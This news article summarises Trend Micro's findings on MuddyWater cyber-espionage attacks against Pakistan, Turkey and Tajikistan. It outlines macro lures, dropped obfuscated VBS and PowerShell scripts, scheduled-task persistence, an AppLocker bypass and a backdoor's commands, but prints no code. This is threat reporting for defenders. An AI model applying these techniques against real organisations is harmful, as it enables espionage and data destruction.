Security researchers at Trend Micro link recent cyber espionage attacks against organizations in Pakistan, Turkey, and Tajikistan to older MuddyWater campaigns.
The MuddyWater campaigns managed to make a great confusion before, making it difficult to be linked to a specific threat actor. However, the experts proved that the artifacts associated with MuddyWater were used in attacks against the Saudi Arabian government, in assaults linked to a single attack framework, and in incidents attributed to the hacking group FIN7.
Considering the targeted organizations and the focus on gathering of information and upload it to the command and control (C&C) servers, Trend Micro claims that the threat actors behind the attacks are focused on espionage activities mostly.
The most recent attacks involve numerous links to the previously observed MuddyWater campaigns and show that “the attackers are not merely interested in a one-off campaign, but will likely continue to perform cyberespionage activities against the targeted countries and industries,” the experts state.
The similarities to the previous MuddyWater campaigns include the focus on the Middle East targets, the use of documents attempting to mimic government organizations, the dropping of a Visual Basic file and a Powershell file (the VBS executes the PS), as well as the use of numerous hacked websites as proxies. Besides, the attacks show similar obfuscation processes and internal variables after deobfuscation.
The malicious documents which target individuals working for government organizations and telecommunication companies in Tajikistan use engineering to trick victims into enabling macros. Some of the payloads were embedded inside the document itself, while others were downloaded from the Internet.
Once the macros are enabled, the Visual Basic script and PowerShell script, both obfuscated, are dropped in the ProgramData directory. Then, a scheduled task is created with the path to the VBS script to ensure persistence.
As part of other attacks, the second file dropped is a base64 encoded text file resulting in the Powershell file after decoding. Another campaign would drop three files: an .sct scriptlet file, an .inf file, and a base64 encoded data file. The first two use publicly available code to bypass applocker.
The PowerShell script is divided into three parts: one contains global variables (paths, encryption keys, a list of gates and hacked websites used as proxies), the second contains functions related to standard RSA encryption, and the third contains a backdoor function.
The backdoor collects machine information, takes screenshots, and sends all data to the C&C. It also includes support for commands such as clean (attempts to delete all items from drives C, D, E, and F), reboot, shutdown, screenshot, and upload. Communication with the C&C is performed via XML messages.
In case an improper request is sent to the C&C server, it replies with the following message: ‘Stop!!! I Kill You Researcher.’ This level of personalized messaging shows that the hackers are monitoring what data is going to and from their C&C server.
Trend Micro also explains that if the communication with the C&C fails and the PowerShell script is run from a command line, error messages written in simplified Mandarin Chinese are displayed. These messages are more likely machine-translated than written by a native speaker.